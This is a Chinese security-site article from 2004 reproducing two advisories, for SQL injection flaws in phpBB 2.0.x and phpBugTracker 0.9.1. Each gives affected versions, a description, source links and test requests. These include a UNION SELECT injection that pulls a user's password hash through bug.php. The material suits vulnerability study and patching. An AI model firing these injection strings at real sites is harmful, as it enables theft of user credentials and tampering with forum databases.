频道栏目
首页 > 安全 > 网站安全 > 正文

两个php论坛sql注入漏洞及测试方法

2004-11-17 08:42:27      个评论      
收藏   我要投稿

一.phpBB远程任意SQL注入漏洞

受影响系统

phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
描述:


--------------------------------------------------------------------------------

phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。

phpBB不正确过滤用户提交的数据,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或更改数据库。

由于phpBB的url解码会把%2527转换成%27(单引号),并没有追加号的,因此存在SQL注入问题,可导致执行任意数据库命令,导致敏感信息泄露或更改数据库。

<*来源:jessica soules (admin@howdark.com
 
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2
*>

测试方法:


--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

jessica soules (admin@howdark.com)提供了如下测试方法:

提交类似如下请求:

viewtopic.php?t=1&highlight=%2527

会显示如下错误信息:

Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on
line 1

Fatal error: Failed evaluating code: preg_replace(#()#i, 1, >POST TEXT
HERE<) in viewtopic.php on line 1109

建议:


--------------------------------------------------------------------------------

厂商补丁:

phpBB Group
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpbb.com/


二.phpBT bug.php SQL注入漏洞

受影响系统:

phpBugTracker phpBugTracker 0.9.1
描述:


--------------------------------------------------------------------------------

PHP Bug Traq是一款基于PHP的漏洞跟踪系统。

PHP Bug Traq的bug.php没有正确过滤用户提交的URL数据,远程攻击者可以利用这个漏洞获得敏感信息或者更改数据库系统。

bug.php没有正确过滤用户提交给bugid的数据,提交包含恶意SQL命令或者恶意HTML代码的数据作为参数数据,可更改原有的数据库逻辑,获得敏感信息或者更改数据库系统。

另外bug.php对project变量数据也缺少充分过滤,存在于上面描述相似漏洞。

<*来源:jessica soules (admin@howdark.com
 
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110029315521568&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=110037408101974&w=2
*>

测试方法:


--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

jessica soules (admin@howdark.com)提供了如下测试方法:

http://www.phpbb.com/bugs/bug.php?op=viewvotes&bugid=1 union select 1,user_password,3
where user_id=2/*

bug.php?op=add&project=0%20union%20select%201

建议:


--------------------------------------------------------------------------------

厂商补丁:

phpBugTracker
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://phpbt.sourceforge.net/

 

 

上一篇:PHP注射一路小跑..
下一篇:不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站